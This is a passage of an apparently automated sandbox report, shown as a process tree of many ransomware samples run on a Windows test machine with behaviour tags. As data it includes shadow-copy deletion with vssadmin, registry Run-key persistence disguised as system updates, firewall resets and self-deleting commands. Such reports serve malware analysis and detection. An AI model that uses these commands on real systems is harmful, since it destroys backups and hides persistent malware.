          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 372
            4⤵
            • Program crash
            PID:1108
        • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Bitman.vho-a71eb17223e9300a1b37f9da5cadc29cbe5b551e661d431eb3fd040eafbc4945.exe
          HEUR-Trojan-Ransom.Win32.Bitman.vho-a71eb17223e9300a1b37f9da5cadc29cbe5b551e661d431eb3fd040eafbc4945.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2336
          • C:\Users\Admin\Documents\amslgq.exe
            C:\Users\Admin\Documents\amslgq.exe
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:3400
            • C:\Windows\System32\vssadmin.exe
              "C:\Windows\System32\vssadmin.exe" Delete Shadows /All /Quiet
              5⤵
              • Interacts with shadow copies
              PID:4152
            • C:\Windows\SysWOW64\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\+REcovER+kwixt+.txt
              5⤵
                PID:5748
              • C:\Windows\System32\vssadmin.exe
                "C:\Windows\System32\vssadmin.exe" Delete Shadows /All /Quiet
                5⤵
                • Interacts with shadow copies
                PID:6100
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\DOCUME~1\amslgq.exe >> NUL
                5⤵
                  PID:2408
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00480\HEUR-T~4.EXE >> NUL
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4636
            • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Blocker.pef-f02cbcc174a9c4bd426fad2cd0e6cb9587e5fa90262d6ff09fe7c672b5653d9d.exe
              HEUR-Trojan-Ransom.Win32.Blocker.pef-f02cbcc174a9c4bd426fad2cd0e6cb9587e5fa90262d6ff09fe7c672b5653d9d.exe
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3820
              • C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
                "C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2248
            • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Blocker.vho-cd47301ad14fefb0d6ac75f8ac1dcf2b0d854527d0f0df495e6d85ef9fc83b9c.exe
              HEUR-Trojan-Ransom.Win32.Blocker.vho-cd47301ad14fefb0d6ac75f8ac1dcf2b0d854527d0f0df495e6d85ef9fc83b9c.exe
              3⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2936
              • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Blocker.vho-cd47301ad14fefb0d6ac75f8ac1dcf2b0d854527d0f0df495e6d85ef9fc83b9c.exe
                HEUR-Trojan-Ransom.Win32.Blocker.vho-cd47301ad14fefb0d6ac75f8ac1dcf2b0d854527d0f0df495e6d85ef9fc83b9c.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:4264
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29~1/sample.pdf"
                  5⤵
                  • Checks computer location settings
                  • Modifies registry class
                  • Suspicious use of WriteProcessMemory
                  PID:2864
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\_MEI29~1\sample.pdf"
                    6⤵
                    • System Location Discovery: System Language Discovery
                    • Checks processor information in registry
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:2384
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:1108
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5AB58EDB7BB8C13DD73AFFD2C1D9902A --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:4352
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=27905C56F8D45BCF7BEE94DF56B0A550 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=27905C56F8D45BCF7BEE94DF56B0A550 --renderer-client-id=2 --mojo-platform-channel-handle=1788 --allow-no-sandbox-job /prefetch:1
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:3556
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1BBFDE4A5C3AA998B7C075D98ED9BCD2 --mojo-platform-channel-handle=2348 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:3896
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=102B8386CD2F241875B204DCF7CE2850 --mojo-platform-channel-handle=1940 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:3004
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3279DD63721494692E53103CDE4C617E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3279DD63721494692E53103CDE4C617E --renderer-client-id=6 --mojo-platform-channel-handle=1932 --allow-no-sandbox-job /prefetch:1
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2196
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A33E63E1D31D6C710488449E20C59A74 --mojo-platform-channel-handle=2440 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:5100
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe""
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:624
                  • C:\Windows\system32\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe"
                    6⤵
                    • Adds Run key to start application
                    • Modifies registry key
                    PID:2676
            • C:\Users\Admin\Desktop\00480\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f52116fc94b8f17dff33a229352b3d2a9d8172295be3cde8370071d895186f88.exe
              HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f52116fc94b8f17dff33a229352b3d2a9d8172295be3cde8370071d895186f88.exe
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              PID:1824
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe"
            2⤵
              PID:4392
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              2⤵
                PID:1144
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 2296 -ip 2296
              1⤵
                PID:4588
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5000
              • C:\Windows\system32\taskmgr.exe
                "C:\Windows\system32\taskmgr.exe" /4
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4496
              • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win64.LockFile.l-7a5999c54f4588ff1581d03938b7dcbd874ee871254e2018b98ef911ae6c8dee.exe
                "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win64.LockFile.l-7a5999c54f4588ff1581d03938b7dcbd874ee871254e2018b98ef911ae6c8dee.exe"
                1⤵
                • Executes dropped EXE
                PID:2208
              • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Zerber.fobf-397a0bf45f99385aa09034dd86e728b9b7ef71f5e119653e6d5273133dcd8bcc.exe
                "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Zerber.fobf-397a0bf45f99385aa09034dd86e728b9b7ef71f5e119653e6d5273133dcd8bcc.exe"
                1⤵
                • Cerber
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:3848
                • C:\Windows\SysWOW64\netsh.exe
                  C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                  2⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3088
                • C:\Windows\SysWOW64\netsh.exe
                  C:\Windows\system32\netsh.exe advfirewall reset
                  2⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2728
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___ROA6_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                  2⤵
                    PID:5980
                  • C:\Windows\SysWOW64\NOTEPAD.EXE
                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___KJ2PZ7ZC_.txt
                    2⤵
                    • Opens file in notepad (likely ransom note)
                    PID:5612
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe"
                    2⤵
                      PID:3040
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im "Trojan-Ransom.Win32.Zerber.fobf-397a0bf45f99385aa09034dd86e728b9b7ef71f5e119653e6d5273133dcd8bcc.exe"
                        3⤵
                        • Cerber
                        • Kills process with taskkill
                        PID:4640
                      • C:\Windows\SysWOW64\PING.EXE
                        ping -n 1 127.0.0.1
                        3⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:1692
                  • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.SuspFile.ae-2aad85dbd4c79bd21c6218892552d5c9fb216293a251559ba59d45d56a01437c.exe
                    "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.SuspFile.ae-2aad85dbd4c79bd21c6218892552d5c9fb216293a251559ba59d45d56a01437c.exe"
                    1⤵
                    • Executes dropped EXE
                    • Sets desktop wallpaper using registry
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Modifies Control Panel
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3052
                  • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.PornoBlocker.ajrm-58f5f8962153d5fbcc96dfa2ef345f396677b9e3d4ab658850cd77726f8b2f37.exe
                    "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.PornoBlocker.ajrm-58f5f8962153d5fbcc96dfa2ef345f396677b9e3d4ab658850cd77726f8b2f37.exe"
                    1⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:2504
                    • C:\Program Files (x86)\84e5c081\jusched.exe
                      "C:\Program Files (x86)\84e5c081\jusched.exe"
                      2⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:4452
                  • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Gimemo.ckmc-5a3b18c2b71724c1ec47ef0ad7e568ba87a7ab14f2d228570d73a6a4ae756b32.exe
                    "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Gimemo.ckmc-5a3b18c2b71724c1ec47ef0ad7e568ba87a7ab14f2d228570d73a6a4ae756b32.exe"
                    1⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2584
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
                      2⤵
                      • Modifies registry key
                      PID:3308
                    • C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
                      "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
                      2⤵
                        PID:2608
                        • C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
                          "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
                          3⤵
                            PID:4092
                        • C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe
                          "C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe"
                          2⤵
                            PID:2064
                        • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.GenericCryptor.czx-605086b511905d825d91e612789c8b6f618c19916b81471893cfdef67f2ac73f.exe
                          "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.GenericCryptor.czx-605086b511905d825d91e612789c8b6f618c19916b81471893cfdef67f2ac73f.exe"
                          1⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5100
                          • C:\Users\Admin\AppData\Local\Temp\vodoi.exe
                            "C:\Users\Admin\AppData\Local\Temp\vodoi.exe"
                            2⤵
                            • Blocklisted process makes network request
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:548
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
                            2⤵
                              PID:3508
                          • C:\Users\Admin\AppData\Local\Microsoft\audiohd.exe
                            C:\Users\Admin\AppData\Local\Microsoft\audiohd.exe
                            1⤵
                            • Process spawned unexpected child process
                            • System Location Discovery: System Language Discovery
                            PID:4644
                          • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.GenericCryptor.czo-84ebab16756772bad59ed3dceac8f50cef325723e48174135e1ce3b2db545eec.exe
                            "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.GenericCryptor.czo-84ebab16756772bad59ed3dceac8f50cef325723e48174135e1ce3b2db545eec.exe"
                            1⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:2432
                            • C:\Users\Admin\AppData\Local\Temp\vodoi.exe
                              "C:\Users\Admin\AppData\Local\Temp\vodoi.exe"
                              2⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:392
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sanfdr.bat" "
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:3188
                          • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.GenericCryptor.cys-eef0787ffb5d04a7ad6ac0006b424f3c65d8e3af963f7c98c48915918e037147.exe
                            "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.GenericCryptor.cys-eef0787ffb5d04a7ad6ac0006b424f3c65d8e3af963f7c98c48915918e037147.exe"
                            1⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3716
                            • C:\Users\Admin\AppData\Local\Temp\vodoi.exe
                              "C:\Users\Admin\AppData\Local\Temp\vodoi.exe"
                              2⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2432
                              • C:\Users\Admin\AppData\Local\Temp\yptew.exe
                                "C:\Users\Admin\AppData\Local\Temp\yptew.exe"
                                3⤵
                                  PID:7072
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
                                2⤵
                                  PID:1876
                              • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Gen.iwh-2dac235c17c26b74f20b3b224a34e13bcbe5c35fbc9164799df8600ec51bd24b.exe
                                "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Gen.iwh-2dac235c17c26b74f20b3b224a34e13bcbe5c35fbc9164799df8600ec51bd24b.exe"
                                1⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:1632
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00480\t\EXItbl.bat" "
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:180
                              • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Encoder.qdi-07c7450e0b0b788d865ca8db9a8d3c31be26d681f35156970753d629ed32e9a7.exe
                                "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Encoder.qdi-07c7450e0b0b788d865ca8db9a8d3c31be26d681f35156970753d629ed32e9a7.exe"
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:1660
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c cls
                                  2⤵
                                    PID:3340
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c cls
                                    2⤵
                                      PID:1596
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c cls
                                      2⤵
                                        PID:208
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c cls
                                        2⤵
                                          PID:3800
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c cls
                                          2⤵
                                            PID:3396
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c cls
                                            2⤵
                                              PID:2728
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c cls
                                              2⤵
                                                PID:3996
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c cls
                                                2⤵
                                                  PID:1100
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c cls
                                                  2⤵
                                                    PID:2316
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c cls
                                                    2⤵
                                                      PID:3748
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c cls
                                                      2⤵
                                                        PID:4100
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c cls
                                                        2⤵
                                                          PID:1312
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c cls
                                                          2⤵
                                                            PID:3844
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c cls
                                                            2⤵
                                                              PID:2212
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c cls
                                                              2⤵
                                                                PID:2304
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c cls
                                                                2⤵
                                                                  PID:4780
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                  2⤵
                                                                    PID:1060
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                    2⤵
                                                                      PID:3196
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                      2⤵
                                                                        PID:3156
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                        2⤵
                                                                          PID:3884
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                          2⤵
                                                                            PID:4612
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                            2⤵
                                                                              PID:3988
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                              2⤵
                                                                                PID:3820
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                2⤵
                                                                                  PID:3340
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                  2⤵
                                                                                    PID:2028
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                    2⤵
                                                                                      PID:2608
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                      2⤵
                                                                                        PID:208
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                        2⤵
                                                                                          PID:2412
                                                                                        • C:\Windows\system32\cmd.exe
